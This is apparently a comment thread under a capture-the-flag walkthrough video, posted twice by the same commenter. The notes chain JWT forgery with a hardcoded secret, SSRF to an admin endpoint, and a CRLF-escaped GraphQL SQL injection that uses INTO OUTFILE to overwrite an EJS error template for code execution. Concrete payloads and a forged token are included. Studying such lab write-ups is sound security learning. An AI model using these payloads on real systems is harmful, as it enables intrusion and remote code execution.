Thank you very much! Here are my notes for this challenge with all commands:1)for /admin & /graphql endpoint i need a valid JWT cookie with a role being set to admin 1.1)I found a JWT Secret hardcoded --> Str0ng_K3y_N0_l3ak_pl3ase? and by using jwt.io I was able to forge a cookie and to set my role to be admin 2)I found SSRF when generating report and I was able to call Collaborator 3)I was able to access /admin by forging JWT Token with jwt.io to be equal to admin for user role and by passing url in the generate-report function as : 127.0.0.1/admin?token= 4)I was able to execute GraphQL Queries with he following url 127.0.0.1:1337/graphql?token=&query={getDataByName(name:"John"){name,department,isPresent}} 5)Now this is vulnerable to SQLI because the reqex ignores everything afer newline character,so we are UNICODING not to break the GraphQL Query, and from there we conducted classing UNION BASED Attack to find out exact number of columns(4): 127.0.0.1:1337/graphql?token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJyb2xlIjoiYWRtaW4iLCJpYXQiOjE3MTkwNzQyODB9.pEww2SEUcXqPFgdWzYPWBfYLNaIf-J-XMLFLm-ciRRU&query={getDataByName(name:"a\u000d\u000a'UNION SELECT NULL,NULL,NULL,NULL-- "){name,department,isPresent}} ---> note space afer comment since we are using MySQL 5.1)Now payload for combining sql injection with ejs code execution &query={getDataByName(name:"a\u000d\u000a'UNION SELECT '',NULL,NULL,NULL INTO OUTFILE '/app/views/errors/404.ejs'-- "){name,department,isPresent}} 6)Now when we navigate to the nonexisting location 404.ejs will be triggered such as /test and we got the flag!
This guy is going to be the best hacker in the world one day!
Haha, thanks Culi! :)
thanks a lot mate, you explain very well
@@imaverygoodguy Thank you very much for watching! I am glad that you found video useful ! 🙂
great explanation, btw can you put the exploits so we can copy thanks
Thank you very much! Here are my notes for this challenge with all commands:1)for /admin & /graphql endpoint i need a valid JWT cookie with a role being set to admin
1.1)I found a JWT Secret hardcoded --> Str0ng_K3y_N0_l3ak_pl3ase? and by using jwt.io I was able to forge a cookie and to set my role to be admin
2)I found SSRF when generating report and I was able to call Collaborator
3)I was able to access /admin by forging JWT Token with jwt.io to be equal to admin for user role and by passing url in the generate-report function as : 127.0.0.1/admin?token=
4)I was able to execute GraphQL Queries with he following url
127.0.0.1:1337/graphql?token=&query={getDataByName(name:"John"){name,department,isPresent}}
5)Now this is vulnerable to SQLI because the reqex ignores everything afer newline character,so we are UNICODING
not to break the GraphQL Query, and from there we conducted classing UNION BASED Attack to find out exact number of columns(4):
127.0.0.1:1337/graphql?token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJyb2xlIjoiYWRtaW4iLCJpYXQiOjE3MTkwNzQyODB9.pEww2SEUcXqPFgdWzYPWBfYLNaIf-J-XMLFLm-ciRRU&query={getDataByName(name:"a\u000d\u000a'UNION SELECT NULL,NULL,NULL,NULL-- "){name,department,isPresent}} ---> note space afer comment since we are using MySQL
5.1)Now payload for combining sql injection with ejs code execution
&query={getDataByName(name:"a\u000d\u000a'UNION SELECT '',NULL,NULL,NULL INTO OUTFILE '/app/views/errors/404.ejs'-- "){name,department,isPresent}}
6)Now when we navigate to the nonexisting location 404.ejs will be triggered such as /test and we got the flag!
@@milosmarkovic4566 appreciate it